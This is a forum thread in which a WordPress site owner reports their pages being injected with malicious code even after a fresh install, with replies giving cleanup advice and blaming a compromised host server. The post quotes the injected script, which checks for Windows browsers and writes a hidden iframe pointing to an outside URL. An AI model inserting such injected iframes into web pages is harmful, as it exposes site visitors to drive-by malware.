Site being hacked even after fresh install

Hi guys,

I’m having a bit of trouble with my site <snip/> it’s trying to run a java applet, in the source code I can see the below is added to the bottom of the page:

<script type="text/javascript">
function check(){var a=navigator.userAgent;if((a.search(/Win/)>0)&&((a.search(/MSIE/)>0)||(a.search(/Firefox/)>0)||(a.search(/Opera/)>0)))return 1;else return 0}if(check()){document.write("<iframe width=1 height=1 frameborder=0 src=http://www.ornavassovolley.it/efa/conf/table/index.php?out=1374679711></iframe>")}else{document.write("<iframe width=1 height=1 frameborder=0 src=http://www.ornavassovolley.it/gallery/index.html></iframe>")}
</script>

I’ve done a complete fresh install of the wordpress install and database which didn’t fix it. Any idea on how I can fix this?

Many thanks

  1. Run an anti-virus scan on both the server and any computer you use to access the site.
  2. Run an anti-malware/spyware scan on both the server and any computer you use to access the site.
  3. Once the above state that there is nothing found, change all passwords for ftp, admin panels, etc with strong passwords.
  4. Make sure that the version of wordpress that you’re installing is the latest stable version and for the time being don’t install any plugins, it could be that one of the plugins you were using might have a security hole.

You can’t fix it.

The problem is not on your website but on the underlying web host server. I guess someone has hacked the http server or similar. Anyway, it appeared that all sites on the web server you’re using had the same problem (including one of mine). I reported this last night and it appears to have been dealt with this morning between 6am & 7am.

Must admit I spent 3 hours trawling through my website code before accepting that it wasn’t in my site so it must be the server.